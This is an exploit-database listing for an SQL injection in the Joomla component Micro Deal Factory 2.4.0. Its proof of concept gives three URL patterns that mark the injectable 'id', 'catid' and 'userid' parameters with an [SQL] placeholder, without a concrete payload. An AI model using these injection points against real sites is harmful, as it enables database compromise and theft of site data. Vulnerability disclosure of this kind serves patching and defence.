Joomla Micro Deal Factory 2.4.0 Component - id SQL Injection Vulnerability

2018-09-24T00:00:00
ID 1337DAY-ID-31156
Type zdt
Reporter Ihsan Sencan
Modified 2018-09-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Joomla! Component Micro Deal Factory 2.4.0 - 'id' SQL Injection
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/micro-deal-factory/
# Version: 2.4.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
 
# POC: 
# 1)
http://localhost/[PATH]/index.php?option=com_microdealfactory&task=dealdetail&id=[SQL]
http://localhost/[PATH]/my-deals/mydeals/catid,15[SQL]/other
http://localhost/[PATH]/component/microdealfactory/listdeals/userid,44[SQL]/user01

#  0day.today [2018-09-24]  #